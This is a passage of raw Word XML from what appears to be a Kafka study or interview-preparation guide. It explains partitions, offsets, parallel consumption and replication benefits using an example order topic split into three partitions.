          <w:ilvl w:val="1"/>
          <w:numId w:val="1333"/>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Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka keeps track of the offsets for each partition. Each consumer reads from a partition and commits the offset to remember where it left off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C14EE" w14:textId="77777777" w:rsidR="00DD2097"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7E1C72">
          <v:rect id="_x0000_i3154" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="376BF316" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Example of Kafka Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435959F3" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Let’s say we have a Kafka topic named order_topic, and it has </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DC99A4" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>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Partition 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFF04AB" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>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Partition 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462D0A9" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>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Partition 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEBDA9C" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Each message written to the topic will be placed in one of these partitions. The producer can specify a key for the message (e.g., the order ID), and Kafka will use this key to determine the partition. If no key is provided, Kafka will distribute the messages evenly across the partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E45D9" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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lastRenderedPageBreak/>
        <w:t>Here’s an illustration of how the messages might be distribut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12"/>
        <w:gridCol w:w="1551"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="66030987" w14:textId="77777777" w:rsidTr="00DD2097">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="063A71FF" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B340727" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="62C1C156" w14:textId="77777777" w:rsidTr="00DD2097">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D91803F" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Partition 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71F1C28E" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Order 1, Order 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="2F565D39" w14:textId="77777777" w:rsidTr="00DD2097">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E22F4E8" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Partition 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E1A3B00" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Order 2, Order 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="4A0ED6F4" w14:textId="77777777" w:rsidTr="00DD2097">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F430E9A" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Partition 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A93FAF1" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Order 3, Order 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36591B98" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00000000" w:rsidP="008E5BA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C15F51E">
          <v:rect id="_x0000_i3155" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13845E9A" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Benefits of Using Partitions in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582DFF41" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>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Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The ability to add more partitions across more brokers allows Kafka to scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A63B20" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>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Load Distribution</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers can read from different partitions concurrently, allowing for parallel message processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3724A6" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>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High Availability</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partition replication ensures that data is always available, even if a broker fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185CF0B" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>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Efficient Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partitioning allows Kafka to store massive amounts of data efficiently, keeping each partition manageable in size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FCAF9D" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E9ECC1" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1336"/>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Kafka partitions allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>horizontal scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C9656" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1336"/>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Partitions enable </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by distributing messages across multiple brokers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30901C36" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1336"/>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Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is guaranteed </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>within</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a partition, but not across partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23971B96" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1336"/>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Kafka’s ability to partition data enables efficient </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>storage</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while supporting high availability through </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A0668" w14:textId="4E865621" w:rsidR="00DD2097" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DD209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4D5F0DD">
          <v:rect id="_x0000_i3156" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DEC26" w14:textId="12E49132" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB22BB" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="780" w:name="_Toc196308260"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss the concept of Kafka partitions, how they enable parallel processing, and the benefits of distributing data across multiple partitions</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="780"/>
    </w:p>
    <w:p w14:paraId="53791EE6" w14:textId="220AA777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Kafka Partitions: Concept and Importance in Parallel Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A34B2C" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Kafka partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are an essential feature of Kafka’s design that allow it to handle large volumes of data efficiently. A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is essentially a unit of </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data storage</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a Kafka topic. It is an ordered, immutable sequence of records, and Kafka allows topics to be split into multiple partitions to increase performance, scalability, and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B87CD38" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319"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How Kafka Partitions Enable Parallel Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D8CF50" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1337"/>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Data Distribution Across Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F95EE1B" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1337"/>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Kafka topics can be divided into multiple partitions. Each partition is a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log file</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where messages are written in the order they are received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DC4492" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1337"/>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The producer determines which partition the message will go to. If no partition key is provided, Kafka will distribute the messages in a round-robin fashion or based on a hash of the key, ensuring a fairly even distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3F68D0" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1337"/>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Consumer Parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A4A9E3" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1337"/>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Kafka partitions enable </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because each partition can be consumed by a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
